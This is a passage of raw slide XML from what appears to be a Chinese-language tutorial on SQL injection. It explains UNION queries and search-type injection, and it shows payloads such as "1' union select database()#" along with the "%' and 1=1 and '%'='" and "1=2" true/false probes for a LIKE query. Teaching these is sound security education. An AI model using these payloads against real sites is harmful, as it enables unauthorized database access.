            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B70667-3198-46B4-B76B-70BE1DEE3699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442604" y="4339876"/>
            <a:ext cx="4857950" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>验证：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3681816848"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391776" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="5304026" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入分类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>搜索型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E18CD03-08D8-45DC-BEE7-56F06037A00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573853" y="1494144"/>
            <a:ext cx="4323462" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代表语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网站的关键字搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888F102C-3A40-4FA4-B695-F464B70910CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373596" y="2044194"/>
            <a:ext cx="7776488" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>Select xxx from user where contents like '%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>%';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C234BB-ED5B-41F3-A070-79DF5955EB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247545" y="3025198"/>
            <a:ext cx="5231817" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>= 1' union select database()#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB07DD8B-3815-47F4-A159-3D5A41C16FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919714" y="4017475"/>
            <a:ext cx="10919271" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>Select xxx from user where contents like '% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' union select database()# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>%';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A24AB4-749B-415E-85AE-9E457B3711C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490221" y="4382638"/>
            <a:ext cx="1145148" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>验证：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96056492-80E3-4D02-827F-0DC3965263D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799619" y="4790534"/>
            <a:ext cx="6931749" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= '                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5FC90F-F4F2-4E36-A07F-6DA27BC72E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799620" y="5202835"/>
            <a:ext cx="8350464" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= %' and 1=1 and '%'='   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>页面与①不同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B91418C-1539-460D-AC72-E54C24524C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799620" y="5581793"/>
            <a:ext cx="6931748" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= %' and 1=2 and '%'='   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>页面与②不同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2464003737"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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35DBBDC7-4137-4E62-8E8E-511EF2EA9383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE33A0B2-9575-4FD7-9EF8-9B8416576EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056894C6-E7D6-4D30-B4F5-E11C54893A16}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8954839D-822E-432C-ABF8-5EE9B80CE9A6}"/>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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B17FA1F-3E11-48D1-BD36-559DE6F2D38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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF34843-E312-40D6-966C-3D17A34E60A9}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E251E78C-FF33-4EA5-8ECB-BA7F83972A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1434302" y="793451"/>
            <a:ext cx="1972090" cy="2645659"/>
            <a:chOff x="1404892" y="1201756"/>
            <a:chExt cx="3448463" cy="4626288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC92771-E232-46FD-9576-C1A00DCA270E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1780764"/>
              <a:ext cx="3448463" cy="4047280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
